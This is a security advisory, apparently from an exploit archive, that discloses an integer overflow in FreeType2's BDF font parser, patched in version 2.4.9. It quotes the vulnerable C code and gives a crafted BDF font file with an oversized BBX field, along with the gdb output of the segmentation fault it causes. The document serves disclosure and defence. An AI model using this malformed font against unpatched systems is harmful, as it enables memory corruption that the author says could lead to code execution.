FREETYPE2 BDF font integer overflow in BBX field

1. FREETYPE2 BDF font integer overflow in BBX field
2.  
3. Byoungyoung Lee
4. http://twitter.com/mylifeasageek
5. http://exploitshop.wordpress.com
6.  
7. FREETYPE2 has an integer overflow in handling BBX field. Because this overflow results in allocating much smaller size of buffer and this buffer will be filled with user-controlled buffer, it would be possible to execute the arbitrary codes. This is patched in Freetype2 2.4.9 (http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=c4cad30ed1b1f554aa41a98b0b0fdca6e579e22f).
8.  
9. You can download the PoC at http://www.cc.gatech.edu/~blee303/exploit/freetype2_bdf/bbx.bdf.
10.  
11. In bdflib.c ,
12. /* Allocate enough space for the bitmap. */
13. glyph->bpr = ( glyph->bbx.width * p->font->bpp + 7 ) >> 3;
14.  
15. bitmap_size = glyph->bpr * glyph->bbx.height;
16. if ( bitmap_size > 0xFFFFU )
17. {
18. FT_ERROR(( "_bdf_parse_glyphs: " ERRMSG4, lineno ));
19. error = BDF_Err_Bbx_Too_Big;
20. goto Exit;
21. }
22. else
23. glyph->bytes = (unsigned short)bitmap_size;
24.  
25. if ( FT_NEW_ARRAY( glyph->bitmap, glyph->bytes ) )
26. goto Exit;
27.  
28. 1. "p->font->bpp" can be set as 0x10. "glyph->bbx.width" and
29. "glyph->bbx.height" are a short variable.
30. 2. "glyph->bpr" will be little bit larger than a short value 3. When
31. computing bitmap_size, there could be overflows while still bypasses the
32. check (bitmap_size>0xFFFFU).
33. 4. guess there should be the check for "glyph->bpr" as well.
34.  
35. lifeasageek@ubuntu:~/ft/git/freetype2-demos/bin$ cat ./sample.bdf
36. STARTFONT
37. 2.1 FONT -gnu-unifont-medium-r-normal--16-160-75-75-c-80-iso10646-1
38. SIZE 16 75 75 100
39. FONTBOUNDINGBOX 16 16 0 -2
40. STARTPROPERTIES 2
41. FONT_ASCENT 14
42. FONT_DESCENT 2
43. ENDPROPERTIES
44. CHARS 1
45. STARTCHAR U+0041
46. ENCODING 65
47. SWIDTH 50 0
48. DWIDTH 8 0
49. BBX 53768 39940 0 -2
50. BITMAP
51. 00
52. 01
53. 02
54. 03
55. 04
56. 05
57. 06
58. 07
59. 08
60. 09
61. 10
62. 11
63. 12
64. 13
65. 14
66. 00
67. ENDCHAR
68. ENDFONT
69.  
70. lifeasageek@ubuntu:~/ft/git/freetype2-demos/bin$ ./ftbench -c 1 ./sample.bdf
71. Segmentation fault
72.  
73. lifeasageek@ubuntu:~/ft/git/freetype2-demos/bin$ gdb -q ./ftbench Reading
74. symbols from /home/lifeasageek/ft/git/freetype2-demos/bin/ftbench...(no
75. debugging symbols found)...done.
76. (gdb) r -c 1 ./sample.bdf
77. Starting program: /home/lifeasageek/ft/git/freetype2-demos/bin/ftbench
78. -c 1 ./sample.bdf
79.  
80. Program received signal SIGSEGV, Segmentation fault.
81. 0x080866bf in _bdf_parse_glyphs ()
82. (gdb) info reg
83. eax 0x810d078 135319672
84. ecx 0x0 0
85. edx 0xff 255
86. ebx 0xff 255
87. esp 0xbffff320 0xbffff320
88. ebp 0xbffff398 0xbffff398
89. esi 0x0 0
90. edi 0x0 0
91. eip 0x80866bf 0x80866bf <_bdf_parse_glyphs+2131>
92. eflags 0x210202 [ IF RF ID ]
93. cs 0x73 115
94. ss 0x7b 123
95. ds 0x7b 123
96. es 0x7b 123
97. fs 0x0 0
98. gs 0x33 51
99. (gdb) x/5i 0x080866bf
100. => 0x80866bf <_bdf_parse_glyphs+2131>: movzbl (%eax),%eax
101. 0x80866c2 <_bdf_parse_glyphs+2134>: mov %eax,%edx
102. 0x80866c4 <_bdf_parse_glyphs+2136>: shl $0x4,%edx
103. 0x80866c7 <_bdf_parse_glyphs+2139>: mov -0x20(%ebp),%eax
104. 0x80866ca <_bdf_parse_glyphs+2142>: movzbl 0x80bcfc0(%eax),%eax